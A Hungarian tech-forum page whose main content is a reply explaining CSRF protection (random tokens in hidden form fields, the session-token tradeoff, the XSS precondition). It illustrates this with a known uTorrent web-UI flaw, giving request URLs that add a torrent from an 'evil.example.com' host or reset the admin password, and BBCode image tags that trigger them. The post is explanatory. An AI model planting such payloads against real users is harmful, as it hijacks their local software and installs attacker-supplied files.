- Ismét egy "Idióta" A.I. Projekt, hogy meglovagolja az aktuális trendeket...
- Időutazás floppyval: A 486-os visszavág PCem-men
- AMD Ryzen 9 9900X (100-100000662WOF)+ Samsung 990 PRO 2TB MZ-V9P2T0BW
- Processzor és videokártya szilícium mag fotók újratöltve!
- Az e-sport napistenének ajándéka: Lamzu Inca gamer egér
- droidic: Időutazás floppyval: A 486-os visszavág PCem-men
- gban: Ingyen kellene, de tegnapra
- Elektromos rásegítésű kerékpárok
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- sziku69: Fűzzük össze a szavakat :)
- Luck Dragon: Asszociációs játék. :)
- Gurulunk, WAZE?!
- Fogkefe: elektromos vagy manuális?
- Rap, Hip-hop 90'
- LordAthis: Ismét egy "Idióta" A.I. Projekt, hogy meglovagolja az aktuális trendeket...
Hirdetés
-
LOGOUT
Új hozzászólás Aktív témák
-
válasz
bandi0000 #12731 üzenetére
A CSRF védelem lényege, hogy minden hívásnál random (vagy csak nagyon rövid ideig - egy oldal életciklusáig - él). A tokent nem cookie-ban vagy más lokális store-ban tároljuk, hanem a lap kódjában kerül eltárolásban (legtöbbször hidden form field-ben, mert lekérésnél vissza kell adni a szervernek). A védelem lényege az, hogy a felhasználó nevében nem lehet olyan kérést indítani, aminek a "forrása" nem a kérdéses weboldal.
Illetve a fenti megoldás a "secure" mód - de ez elcseszi a vissza-gomb működését ("CSRF Failure"-t hibát generál), legtöbbször - alacsonyabb biztonsági szinthez, session-élettartamú CSRF-tokent generálnak.
Ennek a védelemnek egyébként az a feltétele, hogy atámadó ne tudja megszerezni a session/csrf token-t (azaz ne legyen az alkalmazásban XSS sebezhetőség - vagy az alkalmazás csrf token segítségével ezonosítsa a felhasználót ne csak session cookie és/vagy kliens ip alapján).
Jó példa erre (wikiből) az alábbi uTorrent sebezhetőség:
Torrent letöltés hozzáadása:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
uTorrent administrator password megváltoztatása
http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladminCSRF támadó kód simán kivitelezhető pl egy IMG tag hozzáadásával, ami a sebezhető címre mutat (BBCode):
[img]http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent[/img]
vagy ide a PH-ra:[IMG:http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent][/IMG]
Új hozzászólás Aktív témák
● olvasd el a téma összefoglalót!
- PowerColor Red Devil RX6700 XT 12GB eladó
- HP Elite x2 1012 G1 Touch 2in1 LTE/4G Win10 Tablet lecsatolható bill. 100%ÚJ Akku, üzletből, 27%ÁFÁS
- Asus TUF Gaming A14 FA401WU - 14" 2.5K 165Hz - Ryzen AI 9 HX 370 - 16GB - 1TB - RTX 4050 - 3 év gari
- Redmagic 10 Pro gamer telefon eladó ! Újszerű, EU modell.
- Samsung Galaxy A33 5G 6/128GB, Megkímélt, Kártyafüggetlen, Töltővel, 1 Év Garanciával!
- Általános igazgatóhelyettes tábla üvegből eladó
- magyar bill. - Lenovo ThinkPad Z13 G1 - AMD Ryzen R7 Pro 6850U, 13.3" 2.8K OGS érintőkijelző
- Huawei Nova Y90 128GB, Kártyafüggetlen, 1 Év Garanciával
- GIGA AKCIÓ!!! AKTIVÁLATLAN iPad Air M2 11" WiFi + CELLULAR 512GB!!! KÉK
- Apple MacBook Air 13 2017 A1466 512Gb SSD / i7 / 8GB RAM / 12 hó jótállás
Állásajánlatok
Cég: FOTC
Város: Budapest